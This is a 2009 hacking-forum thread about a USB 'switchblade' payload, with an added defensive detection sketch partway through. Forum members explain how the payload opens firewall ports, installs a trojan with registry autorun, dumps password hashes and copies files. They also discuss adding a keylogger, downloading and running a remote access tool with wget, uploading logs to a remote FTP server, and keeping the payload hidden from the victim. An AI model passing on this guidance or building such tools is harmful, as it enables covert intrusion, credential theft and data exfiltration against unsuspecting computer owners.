DingleBerries Posted April 1, 2009 Author
0x3, I am a bit confused about your question. Are you talking about installing asp shells and disabling firewall? I do not have any Server 2003 VMs atm, but that is easy to get ;). I was thinking about rewriting the backdoor in the future to support more things, and making it drop a file should be easy, i.e. have it sitting in the code then print it out to a text document named shell.php. It may take me a while, school and what not, but I will try to release what I can when I can (not all of my tools are here :, save the good stuff for myself :P).
0x3 Posted April 1, 2009
:P so please let me know when u release your shell ... kz i really need it ...
DingleBerries Posted April 1, 2009 Author
Slurper Final
Humper Posted April 1, 2009
> Let me explain it a bit more in detail. There are two folders (CD, Flash). The Flash folder has 2 files (2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan (makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe. On the flash side, just put all the files on the root of your drive. Dingleberries.exe grabs some info from the pc, writes the computer's info to a txt file, writes the registry value to autorun the trojan, and then calls slurp.exe (you can remove slurp and replace it with PWDUMP, just rename it slurp.exe). Slurp looks in the ini to find out what file types you want slurped up and puts them in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exists it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands. To use this you will need to make an ISO of the cd folder and flash that to the u3 side.
Thanks, great answer. Just a few more noobish questions:
- I do know how to create an ISO file but how do I flash the usb-drive with it?
- Does Leroy Jenkins work with a router that blocks ports?
- Is it possible to get the usb-drive not showing up options when inserting it what to do with it?
I tried out the latest version of slurp and it worked great and really quick. Does it only search in C:\ and is it possible to search for specific names also along with the other search? What am I able to do with the python trojan? This release was amazing, just tell me if I could help you somehow.
Regards Humper
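The behaviour chain in the explanation quoted above (launch from the drive's CD partition, a firewall port opened, a registry autorun value written, files copied to a folder on the drive) is what a defender can correlate on. The following is an added detection sketch, not part of the original thread and not code from the tool it discusses; the event field names, the Run-key location, the thresholds and the sample events are all assumptions constructed for illustration.

```python
from collections import defaultdict

WINDOW = 120        # seconds after the removable-media launch to correlate
COPY_THRESHOLD = 3  # file writes to the removable drive that count as bulk copy
RUN_KEY = "\\currentversion\\run"  # assumed autorun key; the thread names none

def stage(ev):
    """Map one event to a behaviour stage name, or None."""
    kind, drive = ev["kind"], ev.get("drive_type")
    if kind == "process_start" and drive in ("cdrom", "removable"):
        return "removable_exec"
    if kind == "firewall_rule_added":
        return "firewall_change"
    if kind == "registry_set" and RUN_KEY in ev.get("key", "").lower():
        return "autorun_persistence"
    if kind == "file_create" and drive == "removable":
        return "copy_to_removable"
    return None

def correlate(events):
    """Hosts where a removable-media launch is followed within WINDOW seconds
    by at least two of the other stages; returns {host: sorted stage names}."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["t"]):
        by_host[ev["host"]].append(ev)
    alerts = {}
    for host, evs in by_host.items():
        start = next((e["t"] for e in evs if stage(e) == "removable_exec"), None)
        if start is None:
            continue
        in_window = [stage(e) for e in evs if start <= e["t"] <= start + WINDOW]
        seen = {s for s in in_window if s and s != "copy_to_removable"}
        if in_window.count("copy_to_removable") >= COPY_THRESHOLD:
            seen.add("copy_to_removable")
        if len(seen - {"removable_exec"}) >= 2:
            alerts[host] = sorted(seen)
    return alerts

# Constructed sample telemetry (not from the thread); field names are assumptions.
RUN = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater"
EVENTS = [
    {"host": "PC-01", "t": 0, "kind": "process_start", "drive_type": "cdrom"},
    {"host": "PC-01", "t": 2, "kind": "firewall_rule_added"},
    {"host": "PC-01", "t": 5, "kind": "registry_set", "key": RUN},
    *[{"host": "PC-01", "t": 10 + i, "kind": "file_create", "drive_type": "removable"} for i in range(4)],
    {"host": "PC-02", "t": 0, "kind": "process_start", "drive_type": "cdrom"},
    {"host": "PC-02", "t": 9, "kind": "file_create", "drive_type": "removable"},
    {"host": "PC-03", "t": 0, "kind": "registry_set", "key": RUN},
]
```

On the sample data only PC-01 alerts: PC-02 ran something from a CD and saved one file to a stick, and PC-03 wrote a Run value with no removable-media launch, so neither reaches the two-stage threshold.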
DingleBerries Posted April 1, 2009 Author
> [sic] but how do I flash the usb-drive with it?
Universal Customizer. There are a few versions floating around. The newest version works in vista as well as on 4GB< drives.
> Does Leroy Jenkins work with a router that blocks ports
Leroy Jenkins just starts the payload, makPNF.exe is the actual Trojan and atm it does not. Later I may release a UDP version that will work on routers that block ports.
> Is it possible to get the usb-drive not showing up options when inserting it what to do with it?
I have no idea what that even means.
> Does it only search in C:\ and is it possible to search for specific names
It searches HOME DRIVE/HOMEPATH, so if your drive letter is F:\ it will still work. The rest of the payload relies on the drive being the C:\ drive but that isn't a hard fix, remember this was done in less than a day. Right now it will only do extensions. Adding complete file names never really crossed my mind, I will look into it though.
Cheers!
Sly Posted April 1, 2009
This is probably a dumb question... but how do I protect my computer from the programs once I put it on my U3? Because the current switchblade's payload still attacks my computer when I set it to protect my computer against it. O.o
EDITTTTT scratch that!!! I'll just turn my auto-run off >.<
DingleBerries Posted April 1, 2009 Author
Hold the "shift" key when you insert it.
Sly Posted April 1, 2009
> Let me explain it a bit more in detail. There are two folders (CD, Flash). The Flash folder has 2 files (2 exes and a bat). Autorun runs > Leroy Jenkins then opens a port in the firewall, copies the trojan (makPMF i think was the name), and then runs the bat script that searches for the drive containing DingleBerries.exe. On the flash side, just put all the files on the root of your drive. Dingleberries.exe grabs some info from the pc, writes the computer's info to a txt file, writes the registry value to autorun the trojan, and then calls slurp.exe (you can remove slurp and replace it with PWDUMP, just rename it slurp.exe). Slurp looks in the ini to find out what file types you want slurped up and puts them in a folder like so, COMPUTERNAME > SLURPED FILES. One issue is that if the folder already exists it will stop everything. The client.pyw will require you have python installed. Go to one of the folders that has the computer info dump and type that IP into the client, you can now send commands. To use this you will need to make an ISO of the cd folder and flash that to the u3 side.
Just a few more questions if I may... :P With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works. With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan? Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.< Thanks. :)
Humper Posted April 1, 2009
> Just a few more questions if I may... :P With the client.pyw do I need to save that to my computer too... To access the other computer? I'm still not 100% sure how that works. With the keylogger.exe... Do I just add that to the root of my flash side too? (And do I need to edit the .bat to actually get it to run?) And can I access the logs of the keylogger from my house using the trojan? Sorry for asking so many questions... I'm new and I'm trying to soak in as much as possible... Everyone has to start somewhere I guess? >.< Thanks. :)
If I understood it right you need to download python and then just write testconnection (IP ADDRESS). For the rest just read the whole topic and you will get answers to that.
Regards Humper
Sly Posted April 1, 2009
> If I understood it right you need to download python and then just write testconnection (IP ADDRESS). For the rest just read the whole topic and you will get answers to that. Regards Humper
Ok thanks.
DingleBerries Posted April 1, 2009 Author
Once python is installed, windows or linux, then you double click the pyw (windows) or ./client.pyw (linux). A gui will pop up asking for the IP address and below that there is a place to send commands. If you want to modify the payload add wget.exe to the CD partition and have it copy to the System root, best if you rename it, then you can download files from online and execute them via cmd. This is useful if you have a better RAT, i.e. Poison IVY, and want to install the server to the remote computer. To add wget just modify the batch file
xcopy wget.exe C:\Windows\System32
And if you add the keylogger to it, Windows has a built in ftp command. That means you can remotely upload the log file to some ftp server and read the contents without going back. Just like in linux there are a lot of things that can be done via command line in windows, just read and research. THE MORE YOU KNOW!
Also I haven't tested it, but does the batch file show a window when the drive is inserted? Or are there any signs, other than opening Task Manager, that the payload is running?
Jen Posted April 2, 2009
there's a universal customizer that supports 8gb too!
Sly Posted April 2, 2009
I'm getting an error with trying to create the new CD partition ISO with Universal Customizer... So I'm wondering what I'm doing wrong... I archived all the files in the CD folder and named the .rar U3CUSTOM... then I put the .rar into the BIN folder in the UC and ran it and got the error
Failed to access your U3 smart drive. U3 Customizer will now shut down.
And this is the error that comes up with the log in U3
[MUSK] [408][01:40:22]: CCDServiceImpl::burnImage - failed to open image file C:\UC\bin\U3CUSTOM.ISO
I've tried many different ways to fix it... The older versions of my switchblade still work... so I dunno. If anyone can help... then yeah. :D I'll bake you brownies. <}
DingleBerries Posted April 2, 2009 Author
If you bake me brownies I will do it. Seriously and you have to PROMISE that you will send them to me.
Sly Posted April 2, 2009
Ok, Just send me an address and I'll make them tomorrow ^.^ lol I PROMISE :D
DingleBerries Posted April 2, 2009 Author
http://chriswoodall.weebly.com/programs.html
messsy Posted April 2, 2009
I see that people are confused. I did mention doing a newbie read me from scratch then just add to it as you add to it, I've not had time to test it but it looks good :-D
Humper Posted April 2, 2009
Ok I've flashed the drive and added the "flash" folder to the root. But I still don't really get what client I should use for the keylogger. Also where does it save the IP and the computer info? Also how do I remove all of the files, keylogger and so that I enter to the computer?
Regards Humper
DingleBerries Posted April 2, 2009 Author
The FLASH folder's CONTENTS go in the root of the flash drive, not the folder itself. There is no key logger in the payload... If you read the code in the bat, which runs the shit from flash, you will see how most of it works.. That is why I encouraged people to add to this. If you can't figure it out then I don't really care, it has worked on all the systems I have tested it on.
Sly Posted April 2, 2009
http://rapidshare.com/files/216560498/U3.iso THIS ISO DOES NOT WORK. REMEMBER YOU HAVE TO CHANGE THE BAT FILE!
Send me a message w/ an address and I'll make you the brownies ^.^ When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partition works... I dunno...
DingleBerries Posted April 2, 2009 Author
> Send me a message w/ an address and I'll make you the brownies ^.^ When I used this ISO just how it is it worked just fine... but when I started adding the keylogger & other extra .exes to the .bat... it is giving me same error as before. O.o What the hell am I doing wrong? I guess I just don't understand how the u3 partition works... I dunno...
It's running one extra command; cd SYS VOLUME. I have a personal payload that uses that folder. So if you want you can make a folder named SYS VOLUME and put all the other stuff in there and it will work the same way. To add the keylogger add this to the beginning of the batch file xcopy keylogger.exe C:\\Where\ever\ it would copy it and then carry out the rest of the instructions
Sly Posted April 2, 2009
> It's running one extra command; cd SYS VOLUME. I have a personal payload that uses that folder. So if you want you can make a folder named SYS VOLUME and put all the other stuff in there and it will work the same way. To add the keylogger add this to the beginning of the batch file xcopy keylogger.exe C:\\Where\ever\ it would copy it and then carry out the rest of the instructions
I'm not having a problem with the programs or anything... Universal customizer won't add the ISO to the CD partition of the U3 device when I change the .bat file... when I don't mess with anything and use the one that you made it works just fine...
sem1845 Posted April 3, 2009
i've got a weird problem here. I've got everything working great but the slurper only copies the last extension i put into the slurp.ini file ... my ini file looks like this:
#Place file types here
[File Types]
Extensions = .gif
Extensions = .jpg
Extensions = .pdf
Extensions = .txt
but it only slurps the .txt file. on other versions of your slurper it worked without problems
DingleBerries Posted April 3, 2009 Author
> i've got a weird problem here. I've got everything working great but the slurper only copies the last extension i put into the slurp.ini file
You are right. I'll get to working on that sometime soon.
timmy Posted April 5, 2009
Can you modify the slurper so that it can be pointed towards a File?